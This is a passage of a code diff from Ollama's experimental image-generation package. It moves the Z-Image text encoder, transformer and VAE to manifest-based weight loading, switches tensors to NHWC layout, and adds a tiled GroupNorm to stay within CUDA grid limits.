||||
if vram != 21*GB {
|
||||
t.Errorf("EstimateVRAM() = %d GB, want 21 GB", vram/GB)
|
||||
}
|
||||
}
|
||||
|
||||
func TestHasTensorLayers(t *testing.T) {
|
||||
// Non-existent model should return false
|
||||
if HasTensorLayers("nonexistent-model") {
|
||||
t.Error("HasTensorLayers() should return false for non-existent model")
|
||||
}
|
||||
}
|
||||
|
||||
func TestResolveModelName(t *testing.T) {
|
||||
// Non-existent model should return empty string
|
||||
result := ResolveModelName("nonexistent-model")
|
||||
if result != "" {
|
||||
t.Errorf("ResolveModelName() = %q, want empty string", result)
|
||||
}
|
||||
}
|
||||
@@ -11,6 +11,10 @@ package mlx
|
||||
#include "mlx/c/mlx.h"
|
||||
#include <stdlib.h>
|
||||
#include <stdint.h>
|
||||
#include <string.h>
|
||||
|
||||
// Forward declare cpu_stream
|
||||
static mlx_stream cpu_stream();
|
||||
|
||||
// Cached default GPU stream for all ops
|
||||
static mlx_stream _default_stream = {0};
|
||||
@@ -1026,10 +1030,11 @@ func View(a *Array, dtype int) *Array {
|
||||
return newArray(res)
|
||||
}
|
||||
|
||||
// Contiguous returns a contiguous copy of the array
|
||||
// Contiguous returns a contiguous copy of the array (row-major)
|
||||
func Contiguous(a *Array) *Array {
|
||||
res := C.mlx_array_new()
|
||||
C.mlx_contiguous(&res, a.c, true, C.default_stream())
|
||||
// Use allow_col=false to force row-major contiguous layout
|
||||
C.mlx_contiguous(&res, a.c, false, C.default_stream())
|
||||
return newArray(res)
|
||||
}
|
||||
|
||||
@@ -1724,6 +1729,14 @@ func init() {
|
||||
// Lock main goroutine to OS thread for CUDA context stability.
|
||||
// CUDA contexts are bound to threads; Go can migrate goroutines between threads.
|
||||
runtime.LockOSThread()
|
||||
// Avoid Metal device init crashes on systems without Metal.
|
||||
if runtime.GOOS == "darwin" {
|
||||
if MetalIsAvailable() {
|
||||
SetDefaultDeviceGPU()
|
||||
} else {
|
||||
SetDefaultDeviceCPU()
|
||||
}
|
||||
}
|
||||
RandomState[0] = RandomKey(uint64(time.Now().UnixMilli()))
|
||||
Keep(RandomState[0]) // Global state should persist
|
||||
}
|
||||
@@ -1762,11 +1775,16 @@ func RandomCategorical(logits *Array, axis int, numSamples int) *Array {
|
||||
return RandomCategoricalWithKey(logits, key2, axis, numSamples)
|
||||
}
|
||||
|
||||
// RandomNormal creates a random normal (Gaussian) tensor
|
||||
// RandomNormal creates a random normal (Gaussian) tensor in float32
|
||||
func RandomNormal(shape []int32, seed uint64) *Array {
|
||||
return RandomNormalWithDtype(shape, seed, DtypeFloat32)
|
||||
}
|
||||
|
||||
// RandomNormalWithDtype creates a random normal (Gaussian) tensor with specified dtype
|
||||
func RandomNormalWithDtype(shape []int32, seed uint64, dtype Dtype) *Array {
|
||||
key := RandomKey(seed)
|
||||
res := C.mlx_array_new()
|
||||
C.mlx_random_normal(&res, int32ToCInt(shape), C.size_t(len(shape)), C.MLX_FLOAT32, 0.0, 1.0, key.c, C.default_stream())
|
||||
C.mlx_random_normal(&res, int32ToCInt(shape), C.size_t(len(shape)), C.mlx_dtype(dtype), 0.0, 1.0, key.c, C.default_stream())
|
||||
return newArray(res)
|
||||
}
|
||||
|
||||
|
||||
@@ -311,8 +311,8 @@ type Model struct {
|
||||
}
|
||||
|
||||
func (m *Model) Tokenizer() *tokenizer.Tokenizer { return m.tok }
|
||||
func (m *Model) NumLayers() int { return len(m.Layers) }
|
||||
func (m *Model) VocabSize() int32 { return m.Config.VocabSize }
|
||||
func (m *Model) NumLayers() int { return len(m.Layers) }
|
||||
func (m *Model) VocabSize() int32 { return m.Config.VocabSize }
|
||||
|
||||
func (m *Model) NewCache(int32) []cache.Cache {
|
||||
caches := make([]cache.Cache, len(m.Layers))
|
||||
|
||||
@@ -128,14 +128,9 @@ func (s *FlowMatchEulerScheduler) AddNoise(cleanSample, noise *mlx.Array, timest
|
||||
return mlx.Add(scaledClean, scaledNoise)
|
||||
}
|
||||
|
||||
// InitNoise creates initial noise for sampling
|
||||
// InitNoise creates initial noise for sampling (BFloat16 for GPU efficiency)
|
||||
func (s *FlowMatchEulerScheduler) InitNoise(shape []int32, seed int64) *mlx.Array {
|
||||
return RandomNormal(shape, seed)
|
||||
}
|
||||
|
||||
// RandomNormal creates a random normal tensor using MLX
|
||||
func RandomNormal(shape []int32, seed int64) *mlx.Array {
|
||||
return mlx.RandomNormal(shape, uint64(seed))
|
||||
return mlx.RandomNormalWithDtype(shape, uint64(seed), mlx.DtypeBFloat16)
|
||||
}
|
||||
|
||||
// GetLatentShape returns the latent shape for a given image size
|
||||
|
||||
@@ -3,12 +3,10 @@
|
||||
package zimage
|
||||
|
||||
import (
|
||||
"encoding/json"
|
||||
"fmt"
|
||||
"math"
|
||||
"os"
|
||||
"path/filepath"
|
||||
|
||||
"github.com/ollama/ollama/x/imagegen"
|
||||
"github.com/ollama/ollama/x/imagegen/mlx"
|
||||
"github.com/ollama/ollama/x/imagegen/nn"
|
||||
"github.com/ollama/ollama/x/imagegen/safetensors"
|
||||
@@ -28,19 +26,6 @@ type Qwen3Config struct {
|
||||
HeadDim int32 `json:"head_dim"`
|
||||
}
|
||||
|
||||
// loadQwen3Config loads text encoder config from a JSON file
|
||||
func loadQwen3Config(path string) (*Qwen3Config, error) {
|
||||
data, err := os.ReadFile(path)
|
||||
if err != nil {
|
||||
return nil, fmt.Errorf("read config: %w", err)
|
||||
}
|
||||
var cfg Qwen3Config
|
||||
if err := json.Unmarshal(data, &cfg); err != nil {
|
||||
return nil, fmt.Errorf("parse config: %w", err)
|
||||
}
|
||||
return &cfg, nil
|
||||
}
|
||||
|
||||
// Qwen3Attention implements Qwen3 attention with QK norms
|
||||
type Qwen3Attention struct {
|
||||
QProj *nn.Linear `weight:"q_proj"`
|
||||
@@ -194,33 +179,44 @@ type Qwen3TextEncoder struct {
|
||||
*Qwen3Config
|
||||
}
|
||||
|
||||
// Load loads the Qwen3 text encoder from a directory
|
||||
func (m *Qwen3TextEncoder) Load(path string) error {
|
||||
fmt.Println("Loading Qwen3 text encoder...")
|
||||
// Load loads the Qwen3 text encoder from ollama blob storage.
|
||||
func (m *Qwen3TextEncoder) Load(manifest *imagegen.ModelManifest) error {
|
||||
fmt.Print(" Loading text encoder... ")
|
||||
|
||||
// Load config
|
||||
cfg, err := loadQwen3Config(filepath.Join(path, "config.json"))
|
||||
if err != nil {
|
||||
// Load config from blob
|
||||
var cfg Qwen3Config
|
||||
if err := manifest.ReadConfigJSON("text_encoder/config.json", &cfg); err != nil {
|
||||
return fmt.Errorf("config: %w", err)
|
||||
}
|
||||
m.Qwen3Config = cfg
|
||||
|
||||
// Pre-allocate layers slice
|
||||
m.Qwen3Config = &cfg
|
||||
m.Layers = make([]*Qwen3Block, cfg.NumHiddenLayers)
|
||||
|
||||
// Load weights
|
||||
weights, err := safetensors.LoadModelWeights(path)
|
||||
// Load weights from tensor blobs
|
||||
weights, err := imagegen.LoadWeightsFromManifest(manifest, "text_encoder")
|
||||
if err != nil {
|
||||
return fmt.Errorf("weights: %w", err)
|
||||
}
|
||||
if err := weights.Load(0); err != nil {
|
||||
return fmt.Errorf("load weights: %w", err)
|
||||
}
|
||||
defer weights.ReleaseAll()
|
||||
|
||||
fmt.Print(" Loading weights via struct tags... ")
|
||||
return m.loadWeights(weights)
|
||||
}
|
||||
|
||||
// loadWeights loads weights from any WeightSource into the model
|
||||
func (m *Qwen3TextEncoder) loadWeights(weights safetensors.WeightSource) error {
|
||||
if err := safetensors.LoadModule(m, weights, ""); err != nil {
|
||||
return fmt.Errorf("load module: %w", err)
|
||||
}
|
||||
m.initComputedFields()
|
||||
fmt.Println("✓")
|
||||
return nil
|
||||
}
|
||||
|
||||
// Initialize computed fields
|
||||
// initComputedFields initializes computed fields after loading weights
|
||||
func (m *Qwen3TextEncoder) initComputedFields() {
|
||||
cfg := m.Qwen3Config
|
||||
m.FinalNorm.Eps = cfg.RMSNormEps
|
||||
for _, block := range m.Layers {
|
||||
// Attention
|
||||
@@ -235,9 +231,6 @@ func (m *Qwen3TextEncoder) Load(path string) error {
|
||||
block.InputLayerNorm.Eps = cfg.RMSNormEps
|
||||
block.PostAttnLayerNorm.Eps = cfg.RMSNormEps
|
||||
}
|
||||
|
||||
weights.ReleaseAll()
|
||||
return nil
|
||||
}
|
||||
|
||||
// Forward encodes text tokens
|
||||
|
||||
@@ -4,12 +4,10 @@
|
||||
package zimage
|
||||
|
||||
import (
|
||||
"encoding/json"
|
||||
"fmt"
|
||||
"math"
|
||||
"os"
|
||||
"path/filepath"
|
||||
|
||||
"github.com/ollama/ollama/x/imagegen"
|
||||
"github.com/ollama/ollama/x/imagegen/cache"
|
||||
"github.com/ollama/ollama/x/imagegen/mlx"
|
||||
"github.com/ollama/ollama/x/imagegen/nn"
|
||||
@@ -335,41 +333,49 @@ type Transformer struct {
|
||||
*TransformerConfig
|
||||
}
|
||||
|
||||
// Load loads the Z-Image transformer from a directory
|
||||
func (m *Transformer) Load(path string) error {
|
||||
fmt.Println("Loading Z-Image transformer...")
|
||||
// Load loads the Z-Image transformer from ollama blob storage.
|
||||
func (m *Transformer) Load(manifest *imagegen.ModelManifest) error {
|
||||
fmt.Print(" Loading transformer... ")
|
||||
|
||||
// Load config
|
||||
cfg, err := loadTransformerConfig(filepath.Join(path, "config.json"))
|
||||
if err != nil {
|
||||
// Load config from blob
|
||||
var cfg TransformerConfig
|
||||
if err := manifest.ReadConfigJSON("transformer/config.json", &cfg); err != nil {
|
||||
return fmt.Errorf("config: %w", err)
|
||||
}
|
||||
m.TransformerConfig = cfg
|
||||
|
||||
// Pre-allocate slices for loader
|
||||
if len(cfg.AllPatchSize) > 0 {
|
||||
cfg.PatchSize = cfg.AllPatchSize[0]
|
||||
}
|
||||
m.TransformerConfig = &cfg
|
||||
m.NoiseRefiners = make([]*TransformerBlock, cfg.NRefinerLayers)
|
||||
m.ContextRefiners = make([]*TransformerBlock, cfg.NRefinerLayers)
|
||||
m.Layers = make([]*TransformerBlock, cfg.NLayers)
|
||||
|
||||
// Load weights
|
||||
weights, err := safetensors.LoadModelWeights(path)
|
||||
// Load weights from tensor blobs with BF16 conversion
|
||||
weights, err := imagegen.LoadWeightsFromManifest(manifest, "transformer")
|
||||
if err != nil {
|
||||
return fmt.Errorf("weights: %w", err)
|
||||
}
|
||||
|
||||
fmt.Print(" Loading weights as bf16... ")
|
||||
if err := weights.Load(mlx.DtypeBFloat16); err != nil {
|
||||
return fmt.Errorf("load weights: %w", err)
|
||||
}
|
||||
fmt.Printf("✓ (%.1f GB)\n", float64(mlx.MetalGetActiveMemory())/(1024*1024*1024))
|
||||
defer weights.ReleaseAll()
|
||||
|
||||
fmt.Print(" Loading weights via struct tags... ")
|
||||
return m.loadWeights(weights)
|
||||
}
|
||||
|
||||
// loadWeights loads weights from any WeightSource into the model
|
||||
func (m *Transformer) loadWeights(weights safetensors.WeightSource) error {
|
||||
if err := safetensors.LoadModule(m, weights, ""); err != nil {
|
||||
return fmt.Errorf("load module: %w", err)
|
||||
}
|
||||
m.initComputedFields()
|
||||
fmt.Println("✓")
|
||||
return nil
|
||||
}
|
||||
|
||||
// Initialize computed fields
|
||||
// initComputedFields initializes computed fields after loading weights
|
||||
func (m *Transformer) initComputedFields() {
|
||||
cfg := m.TransformerConfig
|
||||
m.TEmbed.FreqEmbedSize = 256
|
||||
m.FinalLayer.OutDim = m.FinalLayer.Output.Weight.Shape()[0]
|
||||
m.CapEmbed.Norm.Eps = 1e-6
|
||||
@@ -383,26 +389,6 @@ func (m *Transformer) Load(path string) error {
|
||||
for _, block := range m.Layers {
|
||||
initTransformerBlock(block, cfg)
|
||||
}
|
||||
|
||||
weights.ReleaseAll()
|
||||
return nil
|
||||
}
|
||||
|
||||
// loadTransformerConfig loads transformer config from a JSON file
|
||||
func loadTransformerConfig(path string) (*TransformerConfig, error) {
|
||||
data, err := os.ReadFile(path)
|
||||
if err != nil {
|
||||
return nil, fmt.Errorf("read config: %w", err)
|
||||
}
|
||||
var cfg TransformerConfig
|
||||
if err := json.Unmarshal(data, &cfg); err != nil {
|
||||
return nil, fmt.Errorf("parse config: %w", err)
|
||||
}
|
||||
// Extract PatchSize from array
|
||||
if len(cfg.AllPatchSize) > 0 {
|
||||
cfg.PatchSize = cfg.AllPatchSize[0]
|
||||
}
|
||||
return &cfg, nil
|
||||
}
|
||||
|
||||
// initTransformerBlock sets computed fields on a transformer block
|
||||
|
||||
@@ -3,12 +3,10 @@
|
||||
package zimage
|
||||
|
||||
import (
|
||||
"encoding/json"
|
||||
"fmt"
|
||||
"math"
|
||||
"os"
|
||||
"path/filepath"
|
||||
|
||||
"github.com/ollama/ollama/x/imagegen"
|
||||
"github.com/ollama/ollama/x/imagegen/mlx"
|
||||
"github.com/ollama/ollama/x/imagegen/safetensors"
|
||||
)
|
||||
@@ -25,19 +23,6 @@ type VAEConfig struct {
|
||||
ShiftFactor float32 `json:"shift_factor"`
|
||||
}
|
||||
|
||||
// loadVAEConfig loads VAE config from a JSON file
|
||||
func loadVAEConfig(path string) (*VAEConfig, error) {
|
||||
data, err := os.ReadFile(path)
|
||||
if err != nil {
|
||||
return nil, fmt.Errorf("read config: %w", err)
|
||||
}
|
||||
var cfg VAEConfig
|
||||
if err := json.Unmarshal(data, &cfg); err != nil {
|
||||
return nil, fmt.Errorf("parse config: %w", err)
|
||||
}
|
||||
return &cfg, nil
|
||||
}
|
||||
|
||||
// GroupNormLayer implements group normalization
|
||||
type GroupNormLayer struct {
|
||||
Weight *mlx.Array
|
||||
@@ -57,49 +42,183 @@ func NewGroupNorm(weight, bias *mlx.Array, numGroups int32) *GroupNormLayer {
|
||||
}
|
||||
|
||||
// Forward applies group normalization
|
||||
// Input and output are in NHWC format [B, H, W, C]
|
||||
func (gn *GroupNormLayer) Forward(x *mlx.Array) *mlx.Array {
|
||||
// x: [B, C, H, W]
|
||||
// x: [B, H, W, C] (NHWC format)
|
||||
shape := x.Shape()
|
||||
B := shape[0]
|
||||
C := shape[1]
|
||||
H := shape[2]
|
||||
W := shape[3]
|
||||
H := shape[1]
|
||||
W := shape[2]
|
||||
C := shape[3]
|
||||
|
||||
// Reshape to [B, groups, C/groups, H, W]
|
||||
// For large spatial sizes, use tiled computation to avoid CUDA grid limits
|
||||
// CUDA grid.y max is 65535, so H*W/16 must be <= 65535, meaning H*W <= ~1M
|
||||
// To be safe, tile when H*W > 512*512 = 262144
|
||||
if H*W > 512*512 {
|
||||
return gn.forwardTiled(x, B, H, W, C)
|
||||
}
|
||||
|
||||
return gn.forwardSmall(x, B, H, W, C)
|
||||
}
|
||||
|
||||
// forwardSmall is the standard GroupNorm for tensors that fit within CUDA grid limits
|
||||
func (gn *GroupNormLayer) forwardSmall(x *mlx.Array, B, H, W, C int32) *mlx.Array {
|
||||
// Reshape to [B, H, W, groups, C/groups]
|
||||
groupSize := C / gn.NumGroups
|
||||
x = mlx.Reshape(x, B, gn.NumGroups, groupSize, H, W)
|
||||
x = mlx.Reshape(x, B, H, W, gn.NumGroups, groupSize)
|
||||
|
||||
// Compute mean and variance per group
|
||||
mean := mlx.Mean(x, 2, true)
|
||||
mean = mlx.Mean(mean, 3, true)
|
||||
// Compute mean and variance per group (over H, W, and C/groups dimensions)
|
||||
mean := mlx.Mean(x, 1, true)
|
||||
mean = mlx.Mean(mean, 2, true)
|
||||
mean = mlx.Mean(mean, 4, true)
|
||||
|
||||
xCentered := mlx.Sub(x, mean)
|
||||
variance := mlx.Mean(mlx.Square(xCentered), 2, true)
|
||||
variance = mlx.Mean(variance, 3, true)
|
||||
|
||||
// Variance over same axes
|
||||
sq := mlx.Square(xCentered)
|
||||
variance := mlx.Mean(sq, 1, true)
|
||||
variance = mlx.Mean(variance, 2, true)
|
||||
variance = mlx.Mean(variance, 4, true)
|
||||
|
||||
// Normalize
|
||||
xNorm := mlx.Div(xCentered, mlx.Sqrt(mlx.AddScalar(variance, gn.Eps)))
|
||||
|
||||
// Reshape back to [B, C, H, W]
|
||||
xNorm = mlx.Reshape(xNorm, B, C, H, W)
|
||||
// Reshape back to [B, H, W, C]
|
||||
xNorm = mlx.Reshape(xNorm, B, H, W, C)
|
||||
|
||||
// Scale and shift (weight and bias are [C])
|
||||
if gn.Weight != nil {
|
||||
weight := mlx.Reshape(gn.Weight, 1, C, 1, 1)
|
||||
weight := mlx.Reshape(gn.Weight, 1, 1, 1, C)
|
||||
xNorm = mlx.Mul(xNorm, weight)
|
||||
}
|
||||
if gn.Bias != nil {
|
||||
bias := mlx.Reshape(gn.Bias, 1, C, 1, 1)
|
||||
bias := mlx.Reshape(gn.Bias, 1, 1, 1, C)
|
||||
xNorm = mlx.Add(xNorm, bias)
|
||||
}
|
||||
|
||||
return xNorm
|
||||
}
|
||||
|
||||
// forwardTiled handles large tensors by processing in H-tiles to avoid CUDA grid limits
|
||||
func (gn *GroupNormLayer) forwardTiled(x *mlx.Array, B, H, W, C int32) *mlx.Array {
|
||||
groupSize := C / gn.NumGroups
|
||||
|
||||
// Keep the input - we need it for slicing tiles later
|
||||
mlx.Keep(x)
|
||||
|
||||
// Compute per-group mean and variance using flattened spatial dimensions
|
||||
// Build the entire compute graph first, then eval once
|
||||
// Reshape to [B, H*W, groups, groupSize]
|
||||
xFlat := mlx.Reshape(x, B, H*W, gn.NumGroups, groupSize)
|
||||
|
||||
// Mean over spatial (axis 1) and groupSize (axis 3) dimensions
|
||||
// Result shape: [B, 1, groups, 1]
|
||||
mean1 := mlx.Mean(xFlat, 1, true)
|
||||
mean := mlx.Mean(mean1, 3, true)
|
||||
|
||||
// Variance using E[X^2] - E[X]^2
|
||||
xSq := mlx.Square(xFlat)
|
||||
meanSq1 := mlx.Mean(xSq, 1, true)
|
||||
meanSq := mlx.Mean(meanSq1, 3, true)
|
||||
meanSquared := mlx.Square(mean)
|
||||
variance := mlx.Sub(meanSq, meanSquared)
|
||||
|
||||
// invStd = 1/sqrt(var + eps)
|
||||
varPlusEps := mlx.AddScalar(variance, gn.Eps)
|
||||
stdDev := mlx.Sqrt(varPlusEps)
|
||||
one := mlx.Full(1.0, 1)
|
||||
invStd := mlx.Div(one, stdDev)
|
||||
|
||||
// Eval mean and invStd together - these are what we need for the tile loop
|
||||
mlx.Keep(mean, invStd)
|
||||
mlx.Eval(mean, invStd)
|
||||
|
||||
// Tile along H dimension
|
||||
tileH := int32(512 * 512 / W)
|
||||
if tileH < 1 {
|
||||
tileH = 1
|
||||
}
|
||||
if tileH > H {
|
||||
tileH = H
|
||||
}
|
||||
|
||||
// Prepare weight and bias reshaped for 4D broadcast [1, 1, groups, groupSize]
|
||||
var weightGN, biasGN *mlx.Array
|
||||
if gn.Weight != nil {
|
||||
weightGN = mlx.Reshape(gn.Weight, 1, 1, gn.NumGroups, groupSize)
|
||||
mlx.Keep(weightGN)
|
||||
mlx.Eval(weightGN)
|
||||
}
|
||||
if gn.Bias != nil {
|
||||
biasGN = mlx.Reshape(gn.Bias, 1, 1, gn.NumGroups, groupSize)
|
||||
mlx.Keep(biasGN)
|
||||
mlx.Eval(biasGN)
|
||||
}
|
||||
|
||||
var tiles []*mlx.Array
|
||||
for hStart := int32(0); hStart < H; hStart += tileH {
|
||||
hEnd := hStart + tileH
|
||||
if hEnd > H {
|
||||
hEnd = H
|
||||
}
|
||||
tileHeight := hEnd - hStart
|
||||
spatialSize := tileHeight * W
|
||||
|
||||
// Build the compute graph for this tile (no intermediate Evals)
|
||||
// Extract tile and flatten spatial dims: [B, tileH*W, groups, groupSize]
|
||||
tile := mlx.Slice(x, []int32{0, hStart, 0, 0}, []int32{B, hEnd, W, C})
|
||||
tileFlat := mlx.Reshape(tile, B, spatialSize, gn.NumGroups, groupSize)
|
||||
|
||||
// Normalize: (x - mean) * invStd
|
||||
tileCentered := mlx.Sub(tileFlat, mean)
|
||||
tileNorm := mlx.Mul(tileCentered, invStd)
|
||||
|
||||
// Apply scale and shift in 4D space
|
||||
if weightGN != nil {
|
||||
tileNorm = mlx.Mul(tileNorm, weightGN)
|
||||
}
|
||||
if biasGN != nil {
|
||||
tileNorm = mlx.Add(tileNorm, biasGN)
|
||||
}
|
||||
|
||||
// Reshape back to [B, tileH, W, C]
|
||||
tileOut := mlx.Reshape(tileNorm, B, tileHeight, W, C)
|
||||
|
||||
// Now eval and keep this tile
|
||||
mlx.Keep(tileOut)
|
||||
mlx.Eval(tileOut)
|
||||
|
||||
tiles = append(tiles, tileOut)
|
||||
}
|
||||
|
||||
// Concatenate tiles along H axis
|
||||
var result *mlx.Array
|
||||
if len(tiles) == 1 {
|
||||
result = tiles[0]
|
||||
} else {
|
||||
result = mlx.Concatenate(tiles, 1)
|
||||
mlx.Eval(result)
|
||||
// Free the individual tiles now that they're concatenated
|
||||
for _, t := range tiles {
|
||||
t.Free()
|
||||
}
|
||||
}
|
||||
|
||||
// Clean up kept arrays
|
||||
mean.Free()
|
||||
invStd.Free()
|
||||
if weightGN != nil {
|
||||
weightGN.Free()
|
||||
}
|
||||
if biasGN != nil {
|
||||
biasGN.Free()
|
||||
}
|
||||
|
||||
return result
|
||||
}
|
||||
|
||||
// Conv2D represents a 2D convolution layer
|
||||
// MLX uses NHWC format, but we store weights in OHWI format for MLX conv
|
||||
// Works natively in NHWC format (MLX's native format)
|
||||
type Conv2D struct {
|
||||
Weight *mlx.Array // [out_channels, kH, kW, in_channels] (OHWI for MLX)
|
||||
Bias *mlx.Array // [out_channels]
|
||||
@@ -123,21 +242,17 @@ func NewConv2D(weight, bias *mlx.Array, stride, padding int32) *Conv2D {
|
||||
}
|
||||
|
||||
// Forward applies convolution
|
||||
// Input x is in NCHW format, we convert to NHWC for MLX, then back to NCHW
|
||||
// Input and output are in NHWC format [N, H, W, C]
|
||||
func (conv *Conv2D) Forward(x *mlx.Array) *mlx.Array {
|
||||
// x: [N, C, H, W] -> [N, H, W, C]
|
||||
xNHWC := mlx.Transpose(x, 0, 2, 3, 1)
|
||||
|
||||
// Conv in NHWC format
|
||||
outNHWC := mlx.Conv2d(xNHWC, conv.Weight, conv.Stride, conv.Padding)
|
||||
|
||||
// Convert back to NCHW: [N, H, W, C] -> [N, C, H, W]
|
||||
out := mlx.Transpose(outNHWC, 0, 3, 1, 2)
|
||||
// Conv in NHWC format (MLX native)
|
||||
out := mlx.Conv2d(x, conv.Weight, conv.Stride, conv.Padding)
|
||||
|
||||
if conv.Bias != nil {
|
||||
bias := mlx.Reshape(conv.Bias, 1, conv.Bias.Dim(0), 1, 1)
|
||||
// Bias is [C], reshape to [1, 1, 1, C] for NHWC broadcast
|
||||
bias := mlx.Reshape(conv.Bias, 1, 1, 1, conv.Bias.Dim(0))
|
||||
out = mlx.Add(out, bias)
|
||||
}
|
||||
|
||||
return out
|
||||
}
|
||||
|
||||
@@ -151,7 +266,7 @@ type ResnetBlock2D struct {
|
||||
}
|
||||
|
||||
// NewResnetBlock2D creates a ResNet block
|
||||
func NewResnetBlock2D(weights *safetensors.ModelWeights, prefix string, numGroups int32) (*ResnetBlock2D, error) {
|
||||
func NewResnetBlock2D(weights safetensors.WeightSource, prefix string, numGroups int32) (*ResnetBlock2D, error) {
|
||||
norm1Weight, err := weights.GetTensor(prefix + ".norm1.weight")
|
||||
if err != nil {
|
||||
return nil, err
|
||||
@@ -216,13 +331,13 @@ func (rb *ResnetBlock2D) Forward(x *mlx.Array) *mlx.Array {
|
||||
|
||||
// Stage 1: norm1
|
||||
{
|
||||
h = rb.Norm1.Forward(x)
|
||||
h = rb.Norm1.Forward(x)
|
||||
mlx.Eval(h)
|
||||
}
|
||||
|
||||
// Stage 2: silu + conv1
|
||||
{
|
||||
prev := h
|
||||
prev := h
|
||||
h = mlx.SiLU(h)
|
||||
h = rb.Conv1.Forward(h)
|
||||
prev.Free()
|
||||
@@ -231,7 +346,7 @@ func (rb *ResnetBlock2D) Forward(x *mlx.Array) *mlx.Array {
|
||||
|
||||
// Stage 3: norm2
|
||||
{
|
||||
prev := h
|
||||
prev := h
|
||||
h = rb.Norm2.Forward(h)
|
||||
prev.Free()
|
||||
mlx.Eval(h)
|
||||
@@ -239,7 +354,7 @@ func (rb *ResnetBlock2D) Forward(x *mlx.Array) *mlx.Array {
|
||||
|
||||
// Stage 4: silu + conv2
|
||||
{
|
||||
prev := h
|
||||
prev := h
|
||||
h = mlx.SiLU(h)
|
||||
h = rb.Conv2.Forward(h)
|
||||
prev.Free()
|
||||
@@ -248,7 +363,7 @@ func (rb *ResnetBlock2D) Forward(x *mlx.Array) *mlx.Array {
|
||||
|
||||
// Residual connection
|
||||
{
|
||||
prev := h
|
||||
prev := h
|
||||
if rb.ConvShortcut != nil {
|
||||
shortcut := rb.ConvShortcut.Forward(x)
|
||||
h = mlx.Add(h, shortcut)
|
||||
@@ -277,7 +392,7 @@ type VAEAttentionBlock struct {
|
||||
}
|
||||
|
||||
// NewVAEAttentionBlock creates an attention block
|
||||
func NewVAEAttentionBlock(weights *safetensors.ModelWeights, prefix string, numGroups int32) (*VAEAttentionBlock, error) {
|
||||
func NewVAEAttentionBlock(weights safetensors.WeightSource, prefix string, numGroups int32) (*VAEAttentionBlock, error) {
|
||||
normWeight, err := weights.GetTensor(prefix + ".group_norm.weight")
|
||||
if err != nil {
|
||||
return nil, err
|
||||
@@ -338,20 +453,20 @@ func NewVAEAttentionBlock(weights *safetensors.ModelWeights, prefix string, numG
|
||||
}
|
||||
|
||||
// Forward applies attention with staged evaluation
|
||||
// Input and output are in NHWC format [B, H, W, C]
|
||||
func (ab *VAEAttentionBlock) Forward(x *mlx.Array) *mlx.Array {
|
||||
residual := x
|
||||
shape := x.Shape()
|
||||
B := shape[0]
|
||||
C := shape[1]
|
||||
H := shape[2]
|
||||
W := shape[3]
|
||||
H := shape[1]
|
||||
W := shape[2]
|
||||
C := shape[3]
|
||||
|
||||
var h *mlx.Array
|
||||
|
||||
// Stage 1: GroupNorm + reshape
|
||||
// Stage 1: GroupNorm + reshape to [B, H*W, C]
|
||||
{
|
||||
h = ab.GroupNorm.Forward(x)
|
||||
h = mlx.Transpose(h, 0, 2, 3, 1)
|
||||
h = ab.GroupNorm.Forward(x)
|
||||
h = mlx.Reshape(h, B, H*W, C)
|
||||
mlx.Eval(h)
|
||||
}
|
||||
@@ -360,7 +475,7 @@ func (ab *VAEAttentionBlock) Forward(x *mlx.Array) *mlx.Array {
|
||||
|
||||
// Stage 2: Q, K, V projections + attention
|
||||
{
|
||||
q := mlx.Linear(h, ab.ToQWeight)
|
||||
q := mlx.Linear(h, ab.ToQWeight)
|
||||
q = mlx.Add(q, ab.ToQBias)
|
||||
k := mlx.Linear(h, ab.ToKWeight)
|
||||
k = mlx.Add(k, ab.ToKBias)
|
||||
@@ -380,11 +495,10 @@ func (ab *VAEAttentionBlock) Forward(x *mlx.Array) *mlx.Array {
|
||||
|
||||
// Stage 3: Output projection + reshape + residual
|
||||
{
|
||||
prev := out
|
||||
prev := out
|
||||
out = mlx.Linear(out, ab.ToOutWeight)
|
||||
out = mlx.Add(out, ab.ToOutBias)
|
||||
out = mlx.Reshape(out, B, H, W, C)
|
||||
out = mlx.Transpose(out, 0, 3, 1, 2)
|
||||
out = mlx.Add(out, residual)
|
||||
prev.Free()
|
||||
mlx.Eval(out)
|
||||
@@ -400,7 +514,7 @@ type UpDecoderBlock2D struct {
|
||||
}
|
||||
|
||||
// NewUpDecoderBlock2D creates an up decoder block
|
||||
func NewUpDecoderBlock2D(weights *safetensors.ModelWeights, prefix string, numLayers, numGroups int32, hasUpsample bool) (*UpDecoderBlock2D, error) {
|
||||
func NewUpDecoderBlock2D(weights safetensors.WeightSource, prefix string, numLayers, numGroups int32, hasUpsample bool) (*UpDecoderBlock2D, error) {
|
||||
resnets := make([]*ResnetBlock2D, numLayers)
|
||||
for i := int32(0); i < numLayers; i++ {
|
||||
resPrefix := fmt.Sprintf("%s.resnets.%d", prefix, i)
|
||||
@@ -467,7 +581,7 @@ type VAEMidBlock struct {
|
||||
}
|
||||
|
||||
// NewVAEMidBlock creates the mid block
|
||||
func NewVAEMidBlock(weights *safetensors.ModelWeights, prefix string, numGroups int32) (*VAEMidBlock, error) {
|
||||
func NewVAEMidBlock(weights safetensors.WeightSource, prefix string, numGroups int32) (*VAEMidBlock, error) {
|
||||
resnet1, err := NewResnetBlock2D(weights, prefix+".resnets.0", numGroups)
|
||||
if err != nil {
|
||||
return nil, err
|
||||
@@ -518,22 +632,31 @@ type VAEDecoder struct {
|
||||
ConvOut *Conv2D
|
||||
}
|
||||
|
||||
// Load loads the VAE decoder from a directory
|
||||
func (m *VAEDecoder) Load(path string) error {
|
||||
fmt.Println("Loading VAE decoder...")
|
||||
|
||||
// Load config
|
||||
cfg, err := loadVAEConfig(filepath.Join(path, "config.json"))
|
||||
if err != nil {
|
||||
// Load loads the VAE decoder from ollama blob storage.
|
||||
func (m *VAEDecoder) Load(manifest *imagegen.ModelManifest) error {
|
||||
// Load config from blob
|
||||
var cfg VAEConfig
|
||||
if err := manifest.ReadConfigJSON("vae/config.json", &cfg); err != nil {
|
||||
return fmt.Errorf("config: %w", err)
|
||||
}
|
||||
m.Config = cfg
|
||||
m.Config = &cfg
|
||||
|
||||
// Load weights
|
||||
weights, err := safetensors.LoadModelWeights(path)
|
||||
// Load weights from tensor blobs
|
||||
weights, err := imagegen.LoadWeightsFromManifest(manifest, "vae")
|
||||
if err != nil {
|
||||
return fmt.Errorf("weights: %w", err)
|
||||
}
|
||||
if err := weights.Load(0); err != nil {
|
||||
return fmt.Errorf("load weights: %w", err)
|
||||
}
|
||||
defer weights.ReleaseAll()
|
||||
|
||||
return m.loadWeights(weights, &cfg)
|
||||
}
|
||||
|
||||
// loadWeights loads VAE weights from any WeightSource
|
||||
